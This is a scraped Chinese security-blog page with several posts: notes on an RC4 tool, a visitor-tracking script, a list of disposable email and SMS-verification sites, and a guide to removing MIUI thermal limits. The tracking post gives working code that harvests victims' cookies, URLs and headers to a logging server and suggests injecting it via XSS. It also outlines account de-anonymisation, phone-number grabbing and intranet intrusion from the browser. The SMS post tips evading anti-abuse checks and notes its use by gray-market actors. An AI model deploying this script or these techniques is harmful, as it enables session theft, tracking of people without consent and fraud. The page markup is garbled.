data-lang="fallback"作者：Nuclear#39;Atk (核攻击) 网站：https://lcx.cc/ 版本：1.0 (2019/06/12) 说明： rc4.exe 模式密码数据 [进制] [输出] 模式：0 = 加密文件，1 = 加密普通字符串，2 = 加密十六进制字符串。密码：加密使用的密钥，如果有空格等特殊字符需要使用双引号引起来。数据：模式 0 为文件路径，模式 1,2 为字符串，特殊字符需要双引号。进制：可选参数，指定输出数据是 16 进制字符串(默认) 还是 2 进制。输出：可选参数，可以将数据输出到指定文件，路径有空格需要双引号。提示： rc4 加密和解密的算法是一样的，加密后用相同密码再次调用即是解密。例子： rc4.exe 0 123456 a.txt rc4.exe 0 123456 a.txt 2 b.txt rc4.exe 0 123456 a.txt 16 rc4.exe 0 123456 a.txt 16 b_hex.txt rc4.exe 1 123456 #34;test string 123456 !@##34; rc4.exe 1 123456 #34;test string 123456 !@##34; 2 a.txt rc4.exe 1 123456 #34;test string 123456 !@##34; 16 a_hex.txt rc4.exe 2 #34;123456#34; 74901714045A66BC0B5251C2D8 rc4.exe 2 #34;123456#34; 74901714045A66BC0B5251C2D8 2 rc4.exe 2 #34;123456#34; 74901714045A66BC0B5251C2D8 16 rc4.exe 2 #34;123456#34; 74901714045A66BC0B5251C2D8 2 a.txt /code/pre/td/tr/table /div /divp　　下载地址：a href="https://lcx.cc/file/4596/rc4.rar"rc4.exe/a/p

IP 定位逆向追踪溯源访客真实身份调查取证

Nuclear'Atk（核攻击）网络安全实验室

2019年4月22日 09:11

p　　a href="https://lcx.cc/"核总/aa href="https://lcx.cc/"(https://lcx.cc/)/a在工作中经常需要a href="https://lcx.cc/tags/%E8%BF%BD%E8%B8%AA/"strong追踪/strong/a某个用户、访客的详细strong访问轨迹/strong，用于a href="https://lcx.cc/tags/%E9%80%86%E5%90%91/"strong逆向反查/strong/a、strong调查分析/strong、strong溯源追踪/strong、a href="https://lcx.cc/tags/%E5%8F%96%E8%AF%81/"strong电子取证/strong/a，以帮助strong定位用户/strong准确strong真实身份/strong、strong实名/strong信息，以及 IP 地址a href="https://lcx.cc/tags/%E5%AE%9A%E4%BD%8D/"strong精确定位/strong/a，最常见于strong犯罪调查/strong、strong攻击事件溯源/strong。/p p　　于是a href="https://lcx.cc/"核总/a根据工作中的strong经验/strong，做了一个高兼容度的 HTTP/HTTPS strong访问轨迹跟踪/strong程序，适用于任何支持 js 的网站或程序，可以strong直接载入/strong或者使用 strongXSS 远程加载/strong（你懂的），收集了几乎 HTTP 协议所能抓取到的所有访客信息。/p h2 id="信息维度"信息维度/h2 p　　收集的信息覆盖范围主要包含以下strong维度/strong：/p p　　1、服务器端和 HTTP 头：/p blockquote ul li访问时间/li li访问方法（a href="https://lcx.cc/post/2312/"GET/POST/HEAD/a）/li li访客 IP 地址/li li访客使用的端口/li li访客操作系统类型（User-Agent）/li li原始 HTTP 头(UTF8-URL 编码)/li li原始 Cookies 数据/li li原始 POST 数据/li li原始 GET 数据/li /ul /blockquote p　　2、客户端浏览器 js a href="https://lcx.cc/tags/%E8%84%9A%E6%9C%AC/"脚本/astrong二次深度增强收集/strong：/p blockquote ul lihref(document.location.href)/li litop_href(top.location.href)/li liopener((window.opener amp;amp; window.opener.location.href) ? window.opener.location.href: lsquo;')/li lititle(document.title)/li licookie(document.cookie)/li lireferer(document.referrer)/li liscreen(screen.width + lsquo;*rsquo; + screen.height)/li liuser-agent(navigator.userAgent)/li /ul /blockquote p　　提示一下，strong原始 HTTP 头/strong中包含了strong更详细的系统信息/strong，有完整的strong代理链路/strong以及代理后的strong真实 IP 地址/strong，例如字段：/p blockquote ul liClient-IP/li liTrue-Client-IP/li liX-Client-IP/li liX-Forwarded-For/li liX-Forwarded-Host/li liX-Originating-IP/li liX-Real-IP/li liX-Remote-Addr/li liX-Remote-IP/li /ul /blockquote h2 id="增强升级"增强升级/h2 p　　这些详细信息基本已经足够用了，但既然这个话题已经写到这里了，就多strong写点干货/strong吧，其实还可以再strong深度升级/strong一下，例如：/p ol li利用 a href="https://lcx.cc/post/1769/"strongres:///strong/a 协议刺探客户端文件信息、a href="https://lcx.cc/post/3065/"strong检测客户端环境/strong/a、是否安装360、strong杀毒软件/strong、某些系统文件等。/li li使用 strongHTML5 Canvas/strong 计算客户端浏览器唯一a href="https://lcx.cc/tags/%E6%8C%87%E7%BA%B9/"指纹/a、strong指纹跟踪/strong。/li li利用各大社交、购物、视频、a href="https://lcx.cc/post/3422/"ISP 运营商/a等网站的 a href="https://lcx.cc/tags/cookie/"cookies/a、a href="https://lcx.cc/tags/xss/"xss/a、a href="https://lcx.cc/post/2010/"csrf/a、a href="https://lcx.cc/tags/json/"json/a 定位用户a href="https://lcx.cc/post/4444/"strong登录的账号/strong/a信息。/li li还可以抓取访客a href="https://lcx.cc/post/3812/"strong手机号/strong/a、a href="https://lcx.cc/tags/qq/"strongQQ号/strong/a。/li li还可以获取a href="https://lcx.cc/post/4490/"strong内网 IP 地址/strong/a、a href="https://lcx.cc/post/4366/"strongMac 地址/strong/a、a href="https://lcx.cc/post/4366/"硬件信息/a、strong刺探内网资源/strong。/li li甚至可以使用 a href="https://lcx.cc/tags/js/"js/a strong利用漏洞/strong或strong弱口令入侵/strong内网 Windows 系统、Linux 系统、strong工控设备/strong、路由器、strong摄像头/strong、交换机等其他智能设备，高级渗透、strong反向入侵/strong。/li li如果目标用户是strong移动客户端/strong的话（例如strong微信/strong或strong手机浏览/strong器等），还可以尝试 strongHTML5/strong 中新加的strong地理位置功能(Geolocation API)strong进行/strong详细定位/strong，获取strong精准 a href="https://lcx.cc/tags/gps/"GPS/a 经纬度坐标/strong信息。/li lia href="https://lcx.cc/"核总/aa href="https://lcx.cc/"(https://lcx.cc/)/a在这里strong抛砖引玉/strong，各路大神strong自由发挥/strong~/li /ol h2 id="脚本源码"脚本源码/h2 p　　index.html/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"lt;titlegt;Test 测试lt;/titlegt; lt;bodygt; lt;!-- lt;img src=#34;##34; onerror=#34;x = document.createElement(#39;script#39;);x.src = #39;js.asp#39;;document.body.appendChild(x);#34; /gt; --gt; lt;/bodygt; lt;script type=#34;text/javascript#34; src=#34;js.asp#34;gt;lt;/scriptgt; lt;a href=#34;##34; onclick=#34;window.open(#39;index.html#39;, #39;_blank#39;);#34;gt;openerlt;/agt; lt;script type=#34;text/javascript#34;gt; document.write(#39;lt;a href=#34;http://localhost/?#39;+Math.floor(Math.random() * 999999 + 1)+#39;##39;+Math.floor(Math.random() * 999999 + 1)+#39;#34;gt;http://localhost/lt;/agt;#39;) lt;/scriptgt; /code/pre/td/tr/table /div /divp　　js.asp/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /spanspan class="lnt"23 /spanspan class="lnt"24 /spanspan class="lnt"25 /spanspan class="lnt"26 /spanspan class="lnt"27 /spanspan class="lnt"28 /spanspan class="lnt"29 /spanspan class="lnt"30 /spanspan class="lnt"31 /spanspan class="lnt"32 /spanspan class="lnt"33 /spanspan class="lnt"34 /spanspan class="lnt"35 /spanspan class="lnt"36 /spanspan class="lnt"37 /spanspan class="lnt"38 /spanspan class="lnt"39 /spanspan class="lnt"40 /spanspan class="lnt"41 /spanspan class="lnt"42 /spanspan class="lnt"43 /spanspan class="lnt"44 /spanspan class="lnt"45 /spanspan class="lnt"46 /spanspan class="lnt"47 /spanspan class="lnt"48 /spanspan class="lnt"49 /spanspan class="lnt"50 /spanspan class="lnt"51 /spanspan class="lnt"52 /spanspan class="lnt"53 /spanspan class="lnt"54 /spanspan class="lnt"55 /spanspan class="lnt"56 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"lt;% #39;On Error Resume Next #39; 记录日志 savelog() #39; 没有参数则输出 js 代码，收集更详细的信息 if request(#34;href#34;) = #34;#34; then outputjs() end if #39;--------------------------------------------------------------------------------------------------- public function outputjs() response.clear response.addheader #34;Content-Type#34;, #34;application/javascript#34; %gt; (function() { var u = #39;//lt;%=Request.ServerVariables(#34;HTTP_HOST#34;)amp;Request.ServerVariables(#34;SCRIPT_NAME#34;)%gt;#39; + #39;?href=#39; + encodeURIComponent((function() {try {return document.location.href} catch(e) {return #39;#39;}})()) + #39;amp;top_href=#39; + encodeURIComponent((function() {try {return top.location.href} catch(e) {return #39;#39;}})()) + #39;amp;opener=#39; + encodeURIComponent((function() {try {return (window.opener amp;amp; window.opener.location.href) ? window.opener.location.href: #39;#39;} catch(e) {return #39;#39;}})()) + #39;amp;title=#39; + encodeURIComponent((function() {try {return document.title} catch(e) {return #39;#39;}})()) + #39;amp;cookie=#39; + encodeURIComponent((function() {try {return document.cookie} catch(e) {return #39;#39;}})()) + #39;amp;referer=#39; + encodeURIComponent((function() {try {return document.referrer} catch(e) {return #39;#39;}})()) + #39;amp;screen=#39; + encodeURIComponent((function() {try {return screen.width + #39;*#39; + screen.height} catch(e) {return #39;#39;}})()) + #39;amp;user-agent=#39; + encodeURIComponent((function() {try {return navigator.userAgent} catch(e) {return #39;#39;}})()); if (document.body != null) { var x = document.createElement(#39;script#39;); x.src = u; document.body.appendChild(x); } else { document.write(#39;lt;scr#39; + #39;ipt src=\#39;#39; + u + #39;\#39;gt;lt;/scr#39; + #39;iptgt;#39;); } })(); lt;% response.end end function public function savelog() #39; 记录日志，格式：时间,方法,访客IP,访客端口,系统类型,原始HTTP头(UTF8-URL编码),Cookies数据,原始POST数据,原始GET数据 dim fso set fso = server.createobject(#34;scripting.filesystemobject#34;) set file = fso.opentextfile(server.mappath(#34;.\cf3a7c3e_#34; amp; year(date) amp; month(date) amp; day(date) amp; #34;.txt#34;), 8, true) file.writeline now amp; vbtab amp; _ request.servervariables(#34;request_method#34;) amp; vbtab amp; _ request.servervariables(#34;remote_addr#34;) amp; vbtab amp; _ request.servervariables(#34;remote_port#34;) amp; vbtab amp; _ request.servervariables(#34;http_user_agent#34;) amp; vbtab amp; _ server.urlpathencode(request.servervariables(#34;all_raw#34;)) amp; vbtab amp; _ request.cookies amp; vbtab amp; _ request.form amp; vbtab amp; _ request.querystring file.close end function %gt; /code/pre/td/tr/table /div /divh2 id="参考资料"参考资料/h2 p　　a href="https://lcx.cc/post/482/"【Asp】Asp超精准判断客户端浏览器类型/a/p p　　a href="https://lcx.cc/post/515/"【Asp】ASP获取客户端/服务器相关信息/a/p p　　a href="https://lcx.cc/post/487/"【Asp】判断客户端系统和浏览器类型以及版本/a/p p　　a href="https://lcx.cc/post/507/"【Asp原创】Asp超详细显示客户端系统信息/a/p p　　a href="https://lcx.cc/post/2010/"【CSRF】基于图片方式(lt;img)的 DDOS、CC、会话劫持以及刺探用户信息/a/p p　　a href="https://lcx.cc/post/507/"Asp超详细显示客户端系统信息/a/p p　　a href="https://lcx.cc/post/515/"ASP获取客户端、服务器相关信息/a/p p　　a href="https://lcx.cc/post/2312/"HTTP 协议中 POST、GET、HEAD 等参数详解/a/p p　　a href="https://lcx.cc/post/4366/"JavaScript 获取客户端计算机硬件及系统信息/a/p p　　a href="https://lcx.cc/post/4444/"JSON探针—定位目标网络虚拟信息身份，利用大量三方网站cookie进行追踪/a/p p　　a href="https://lcx.cc/post/4490/"JS绕过代理、VPN获取真实IP及内网IP，逆向追踪/a/p p　　a href="https://lcx.cc/post/1769/"Microsoft RES 协议详解与安全 - RES 协议浅析/a/p p　　a href="https://lcx.cc/post/3065/"XSS检测客户端环境，javascript 检测客户端文件、系统环境/a/p p　　a href="https://lcx.cc/post/3812/"网站插入一段神奇代码即可获取浏览者手机号码截取访客电话号码手机营销/a/p p　　a href="https://lcx.cc/post/1844/"修改浏览器的 User-Agent 来伪装你的浏览器和操作系统/a/p p　　a href="https://lcx.cc/post/3422/"中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人/a/p

国内外临时匿名邮箱及接收手机短信验证码网站

Nuclear'Atk（核攻击）网络安全实验室

2019年3月31日 15:27

p　　a href="https://lcx.cc/"strong核总/strong/aa href="https://lcx.cc/"(https://lcx.cc/)/a自从业以来，因为strong行业特殊/strong，所以一直有各种相关需要，于是这些年从各个地方收集了一些国、内外strong免费/strong临时接收strong邮箱/strong及strong手机/strong短信strong验证码/strong的网站平台，数量比较多，抽时间进行了一些整理，在这里总结记录一下。/p p　　主要是一些strong匿名、临时、一次性/strong的邮箱地址，以及可以strong免费收发短信验证码/strong的手机号平台，方便strong注册/strong各种账号时strong完全匿名/strong、strong隐藏真实身份/strong，像strong黑产大佬/strong、strong灰产大佬/strong和strong羊毛党/strong们都精通此道，a href="https://lcx.cc/"strong核总/strong/a就不必多废话了……/p p　　而像a href="https://lcx.cc/"核总/aa href="https://lcx.cc/"(https://lcx.cc/)/a这种strong遵纪守法/strong的好公民，最多也就随便strong注册/strong下strong小号/strong，避免strong泄漏个人真实信息/strong，免的到处都收到各种strong垃圾骚扰广告/strong信息。/p h2 id="匿名个人身份信息生成器"匿名个人身份信息生成器/h2 p　　a href="https://www.fakenamegenerator.com/"Generate a Random Name - Fake Name Generator/a/p p　　国外的一个strong随机匿名假身份信息生成器/strong，可以生成一套包括姓名、性别、年龄、国家、身份证号、银行卡号、电话号码、a href="http://www.fakemailgenerator.com/"邮箱地址/a、身高、体重、血型、车辆信息等的匿名身份资料，针对strong注册国外账户比较实用/strong。/p p　　同时还附赠一个a href="http://www.fakemailgenerator.com/"匿名假邮箱生成器/a，可以当作临时、一次性、匿名邮箱使用。/p p　　a href="https://lcx.cc/"核总/astrong特别推荐/strong，非常实用。/p h2 id="protonmail"ProtonMail/h2 p　　a href="https://protonmail.com/"https://protonmail.com//a，一个可以strong完全匿名使用/strong的电子邮箱。/p p　　ProtonMail 世界上最大的以strong个人隐私安全/strong为特色的加密电子邮件提供商，总部在strong瑞士/strong，2013 年由欧洲核子物理研究所（CERN）、麻省理工（MIT）、以及哈佛（Harvard）的研究人员联合创建，致力于为注重隐私和安全性的用户提供加密电子邮件服务。/p p　　支持免费和付费两类帐户，所有账户均使用strong端到端加密/strong功能，默认启用 PGP 加密，支持strong使用 Tor 网络访问/strong！/p p　　如果你需要安全性强，又有极高隐私且无广告的电子邮件信箱，ProtonMail 绝对是目前最好的选择。/p p　　以下是官方的介绍：/p p　　strong瑞士隐私·数据安全性和中立性/strong/p p　　ProtonMail 在瑞士注册成立，我们所有的服务器都在瑞士。这意味着所有用户数据都受到严格的瑞士隐私法律的保护。/p p　　strong端到端加密·自动邮件安全/strong/p p　　所有电子邮件都通过端到端加密自动保护。这意味着即使我们无法解密和阅读您的电子邮件。因此，您的加密电子邮件无法与第三方共享。/p p　　strong匿名电子邮件·保护您的隐私/strong/p p　　创建您的安全电子邮件帐户不需要任何个人信息。默认情况下，我们不保留任何可链接到您的匿名电子邮件帐户的 IP 日志。您的隐私至上。/p p　　strong开源的·免费的安全电子邮件/strong/p p　　我们认为电子邮件隐私应该对所有人开放。这就是为什么我们的代码是开源的，而ProtonMail基本帐户始终是免费的。/p p　　strong提示/strong：ProtonMail 为了strong防止滥用/strong，strong会根据注册环境判断是否需要人机验证/strong，可以使用 a href="https://www.guerrillamail.com/"https://www.guerrillamail.com//a 的 strongguerrillamail.org、grr.la/strong 等后缀临时邮箱通过验证，另外注册时记得使用 Chrome 的strong隐身模式/strong，或者每次修改 User-Agent，因为 protonmail 会根据strong浏览器指纹/strong做判断，或者在验证的时候直接选strong择捐赠虚拟币/strong，简单粗暴。/p h2 id="临时一次性匿名邮箱"临时、一次性、匿名邮箱/h2 p　　a href="https://mail.mjj.edu.ge/"临时邮箱- 马建军大学免费教育邮箱/a，可以通过一些网站的教育认证，strong享受教育优惠（白嫖）/strong/p p　　a href="http://www.fakemailgenerator.com/"Fake Mail Generator - Free temporary email addresses/a/p p　　a href="http://24mail.chacuo.net/"查错网 - 临时邮箱、十分钟邮箱（10分钟)、临时邮、临时Email/a，还支持a href="http://tool.chacuo.net/mailsend"发邮件/a！/p p　　a href="http://www.yopmail.com/"YOPmail - 临时、匿名的免费邮箱地址/a/p p　　a href="https://10minutemail.net/"10分钟邮箱/a - a href="https://10minutemail.net/"10minutemail.net/a、a href="https://10minutemail.org/"10minutemail.org/a、a href="https://10minutemail.info/"10minutemail.info/a/p p　　a href="https://www.linshiyouxiang.net/"临时邮箱 - 十秒钟内收到邮件/a/p p　　a href="https://www.guerrillamail.com/"Guerrilla Mail - Disposable Temporary E-Mail Address/a，支持strong发送邮件/strong！/p p　　a href="https://www.moakt.com/"Moakt Email - 临时邮箱专业服务/a，支持strong发送邮件/strong！/p p　　a href="https://temp-mail.org/"Temp Mail - Disposable Temporary Email/a/p p　　a href="https://temp-mail.io/"一次性临时电子邮件 - 📨 Temp Mail/a/p p　　a href="https://cryptogmail.com/"Temp Mail - Free Temporary Email/a/p p　　a href="https://tempail.com/"Temp Mail - Temporary Email/a/p p　　a href="https://tempmailo.com/"Temp Mail - Temporary Disposable Email Address/a/p p　　a href="https://dropmail.me/"Temporary email. Email for 10 minutes or more./a/p p　　a href="https://www.yinsiduanxin.com/mail.html"临时一次性匿名电子邮箱 - 隐私邮箱/a/p p　　delhttps://linshiyou.com//del（2020年2月14日发现已停止解析）/p p　　strong由于平台较多，不能逐一验证、及时更新，欢迎a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E8%81%94%E7%B3%BB%E6%96%B9%E5%BC%8F"联系我/a纠错、补充！/strong/p h2 id="国内外手机号短信验证码平台"国内外手机号、短信验证码平台/h2 p　　a href="https://sms-activate.org/"SMS-Activate/a：老牌，一次性短信接码服务，全球虚拟号码，按量购买，注册号码方便/p p　　a href="https://www.textnow.com/"TextNow/a：注册可得免费号码,一周不用会回收(可订阅广告保号),但可以再选/p p　　a href="https://textfree.us/"Textfree/a：注册可得免费号码,一月不用会回收(可订阅广告保号),但可以再选/p p　　a href="https://onphone.app/"OnPhone - 第二个电话号码/a：手机APP,收费的,比较贵,可选国家比较多/p p　　a href="https://sms-man.com/site/free"SMS Man 免费短信验证服务/a：美国,英国,瑞典,荷兰,比利时,乌克兰,以色列,拉脱维亚,等国家/p p　　a href="https://www.yinsiduanxin.com/"短信验证码在线接收码平台 - 隐私短信/a：英国,法国,美国,中国,德国,菲律宾,香港,加拿大/p p　　a href="https://zusms.com/"掠影网络 - 免费在线接收短信验证码/a：香港/美国/加拿大/中国，dela href="https://sms.cngrok.com/receiving-sms/"之前的旧地址/a/del/p p　　a href="https://www.materialtools.com/"materialtools.com - 云短信在线短信接收/a：号码多、号段好，中国,英国，dela href="https://www.pdflibr.com/"旧地址/a/del/p p　　a href="https://yunduanxin.net/"yunduanxin.net - 云短信免费在线接收短信验证码/a：号段好，美国,加拿大,英国,中国/p p　　a href="http://hs3x.com/"Receive SMS Online For Free - Free/a：美国,英国,奥地利,瑞典,比利时/p p　　a href="http://receivefreesms.com/"Receive FREE SMS online/a：美国,法国,俄罗斯,澳大利亚,英国,加拿大,瑞士等各国/p p　　a href="http://receivefreesms.net/"Receive-SMS-Now - 美国,加拿大,西班牙/a/p p　　a href="http://receiveonlinesms.biz/"Receive Online SMS - 美国,瑞典,挪威,西班牙,英国/a/p p　　a href="http://receiveonlinesms.com/"Receive SMS Online - 国外免费临时手机号/a/p p　　a href="http://receive-sms-online.com/"Receive SMS Online - 俄国,英国,乌克兰/a/p p　　a href="http://receivesmsonline.in/"Receive SMS Online - 美国,加拿大,西班牙/a/p p　　a href="http://receivesmsverification.com/"Receive SMS - 比利时,英国,美国/a/p p　　a href="http://sms.sellaite.com/"SELLAITE - 爱沙尼亚/a/p p　　a href="http://www.freesmsverifications.com/"Receive Free SMS - 美国,英国,法国,波兰,比利时,加拿大/a/p p　　a href="http://www.receive-sms-now.com/"Receive-SMS-Now - 美国,加拿大,荷兰/a/p p　　a href="http://www.shejiinn.com/"免费接码|短信验证码|在线接收短信|接码平台 - 中国,缅甸,美国/a/p p　　a href="http://z-sms.com/"Z-SMS - 在线云短信网页版 - 免费接码平台/a：中国,美国,缅甸,爱沙尼亚,等多国/p p　　a href="https://ch.freephonenum.com/"FreePhonenum - 国外免费临时手机号（中文）美国,加拿大/a：strong支持免费发短信/strong/p p　　a href="https://receiveasms.com/"Receive a SMS Online/a：美国,英国,法国,加拿大等全球各国，dela href="https://receive-a-sms.com/"旧地址/a/del/p p　　a href="https://receive-sms.com/"Receive-SMS - 美国/a/p p　　a href="https://smsnumbersonline.com/"Free SMS Numbers Online - 美国,英国,加拿大,波兰/a/p p　　a href="https://sms-online.co/receive-free-sms/"Receive SMS online for Free/a：美国,英国,加拿大,瑞典,法国,马来西亚,印度尼西亚/p p　　a href="https://sms-receive.net/"SMS-Receive - 俄罗斯,法国,罗马尼亚,西班牙,荷兰,英国/a/p p　　a href="https://smsreceivefree.com/"SMSReceiveFree - 美国,英国,加拿大/a/p p　　a href="https://www.freeonlinephone.org/"Free Online Phone - 美国,加拿大,英国,瑞典/a/p p　　a href="https://www.receivesms.co/"Receive SMS Online/a：美国,英国,法国,加拿大等全球各国/p p　　a href="https://www.receivesms.net/"Receive SMS Online - 国外免费临时手机号/a/p p　　a href="https://www.receive-sms-online.info/"Receive SMS Online for FREE/a：英国,罗马尼亚,美国,西班牙,法国,德国,俄罗斯/p p　　a href="https://www.receivesmsonline.net/"RECEIVE SMS ONLINE - 美国,加拿大,英国/a/p p　　a href="https://www.twilio.com/"Twilio - 用于SMS，语音，视频和身份验证的通信API/a：strong支持API调用/strong，看上去很不错/p p　　a href="https://zh.mytrashmobile.com/"MyTrashmobile - 美国,英国,加拿大/a/p p　　a href="http://www.zsrq.net/"2020最新短信验证码接收平台 - 免费接码平台/a/p p　　a href="http://www.xnsms.com/"小鸟接码平台 - 免费提供接码服务 - Receive SMS Online/a/p p　　delbecmd.com - 免费短信验证码接收平台：https://www.becmd.com//del：2021年7月2日，疑似已废弃，已跳转到电影网站/p p　　del云短信 - 免费在线短信接收：https://sms.cm//del：疑似已废弃/p p　　del在线短信验证码接收：http://www.smszk.com//del：2020年2月14日发现已停止解析/p p　　strong由于平台较多，不能逐一验证、及时更新，欢迎a href="https://lcx.cc/%E5%85%B3%E4%BA%8E/#%E8%81%94%E7%B3%BB%E6%96%B9%E5%BC%8F"联系我/a纠错、补充！/strong/p

小米5s 小米6 MIUI 系统删除温控破解限制

Nuclear'Atk（核攻击）网络安全实验室

2019年1月30日 13:21

p　　众所周知，strong小米/strong安卓（Android）手机 strongMIUI/strong 系统有个很狗血的特点：strong温控/strong！/p p　　a href="https://lcx.cc/"strong核总/strong/aa href="https://lcx.cc/"(https://lcx.cc/)/a用小米手机也很多年了，温控也关注过不少，网上一堆strong垃圾内容误导新手跳坑走弯路/strong，所以a href="https://lcx.cc/"strong核总/strong/a在这里进行strong详细完整/strong的strong讲解/strong下。/p p　　注意！文中strong所有涉及到的文件、工具、驱动等资料/strong，文章strong末尾都有下载/strong。/p h2 id="何谓温控"何谓“温控”？/h2 p　　温控全称为手机strong温度控制/strong，即小米安卓手机的一项系统核心功能，当你手机温度超过一定范围时，CPU 将自动strong锁核/strong（多核只能用单核）、限制最高strong频率/strong，So，你的手机突然就会strong卡成幻灯片/strong，在strong充电/strong、strong玩游戏/strong时尤为明显，分分钟strong想砸了手机/strong……/p p　　小米的部分型号十分明显：strong小米 5s/strong、小米 6 等，MIUI 论坛骂声一片，最早还可以在strongMIUI 9 开发版系统/strong设置中自行strong选择/strong是否启用温控（省电策略、strong性能模式/strong、游戏模式），后来更新到 strongMIUI 10/strong 直接strong取消/strong了选择权，So……/p p　　于是米粉们纷纷捣鼓出了例如“strong温控拜拜/strong”、“strong内核调校/strong”之类的 APP strong删温控配置文件/strong或者修改参数，MIUI 9 系统运行良好，后来 MIUI 10 出来后很多不支持了，再后来小米论坛有大神捣鼓出了修改版的温控配置文件，strong完美解决/strong了该问题。/p h2 id="什么是温控配置文件"什么是温控配置文件？/h2 p　　小米的 MIUI 系统核心温控功能实际上是依靠几个主要配置文件，规定了strong温度范围/strong、如何strong限制核心数/strong、频率的strong控制策略/strong等（罪魁祸首），主要在安卓系统中以下路径：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# Bin 文件 /system/vendor/bin/thermal-engine -rwxr-xr-x 1 root shell 6731600 2009-01-01 00:00 # 标准模式 /system/vendor/etc/thermal-engine-8996.conf -rw-r--r-- 1 root root 3744 2009-01-01 00:00 # 游戏模式 /system/vendor/etc/thermal-engine-8996-game.conf -rw-r--r-- 1 root root 3376 2009-01-01 00:00 # 性能模式 /system/vendor/etc/thermal-engine-8996-high.conf -rw-r--r-- 1 root root 3200 2009-01-01 00:00 # ？？模式 /system/vendor/etc/thermal-engine-8996-map.conf -rw-r--r-- 1 root root 176 2009-01-01 00:00 /code/pre/td/tr/table /div /divp　　注意！这里以 MIUI 10 系统为例，根据系统版本不同，文件位置略有不同！/p p　　strong操作及删除之前记得备份！！！记得备份！！！记得备份！！！/strong/p p　　其实不备份也行，反正每次 MIUI 系统升级后，这些文件又会再回来，因为小米系统是strong全覆盖式更新/strong，无论你对系统做了什么修改，每次strong更新之后都会完全恢复/strong……　-_-!!!/p p　　小提示，如果以后系统升级后温控文件位置发生变化，可以通过以下系统命令strong查找温控文件/strong位置：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"find /system -name #34;thermal-engine*#34; /code/pre/td/tr/table /div /divh2 id="前提条件"前提条件/h2 p　　在strong修改温控文件/strong、strong解除温控限制/strong之前，请strong确保/strong你手机已经strong具备以下条件/strong，否则底下内容就strong不用看了/strong，因为权限不够strong无法操作/strong……/p ol li手机必须解锁 BL（BootLoader），否则没有 root 权限无法操作！/li li解锁 system 分区，不然无法操作 system 目录文件。/li li打开开发者模式并开启 USB 调试。/li li将手机连接到电脑，并装好驱动程序和相应工具。/li /ol h3 id="1解锁-blbootloader"1.解锁 BL（BootLoader）/h3 p　　官网有提供解锁教程和方法，而且刷成开发版自带 root 权限，具体的去看官网论坛。/p h3 id="2解锁-system-分区"2.解锁 system 分区/h3 blockquote pstrong★ 警告 ★/strong/p p　　系统 system 分区解锁后如果修改了 system 目录的文件，就不能再上锁（只有使用原版系统文件才能上锁），否则无法通过开机文件校验！！！/p p　　但是下次手机更新后会自动恢复所有系统文件并自动上锁！所以无需担心！系统更新后再次修改温控，需要重复以下的方法关闭就行了。/p /blockquote p　　因为 MIUI 系统开启了安卓的strong系统文件校验/strong，也就是所谓的“strongsystem 锁/strong”，如果不关闭这个strong系统文件校验/strong，那么刷入第三方 RE 或者strong修改 system 分区文件/strong会导致strong无法通过开机文件校验/strong（俗称strong卡米/strong）。/p p　　因为咱们要修改 system 分区的温控配置文件，所以strong必须解锁/strong。/p p　　strong推荐/strong使用命令解锁（strong安全、便捷、高效/strong）：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 解锁命令 adb root adb disable-verity adb reboot # 重新上锁 # ★ 警告 ★ # ★ 如果修改了 system 目录的文件，就不能再上锁，否则无法通过开机文件校验！ ★ adb root adb enable-verity adb reboot /code/pre/td/tr/table /div /divp　　或者“system 分区一键解锁、上锁.apk”、“NFC Emulator”等strong来路不明/strong的第三方应用，strong需要 root 权限/strong，strong不推荐、不安全/strong！/p p　　底下实际操作中有详细说明。/p h3 id="3开启-usb-调试"3.开启 USB 调试/h3 p　　首先进入系统设置，找到系统版本、全部参数（各个系统版本不太一样），最后strong点几下 MIUI 版本/strong就会进入开发者模式。/p p　　然后在系统设置gt;更多设置gt;strong开发者模式/strong，打开开发者选项和 strongUSB 调试/strong。/p h3 id="4安装驱动和工具"4.安装驱动和工具/h3 p　　驱动程序主要为 strongADB Interface/strong 驱动。/p p　　可以使用a 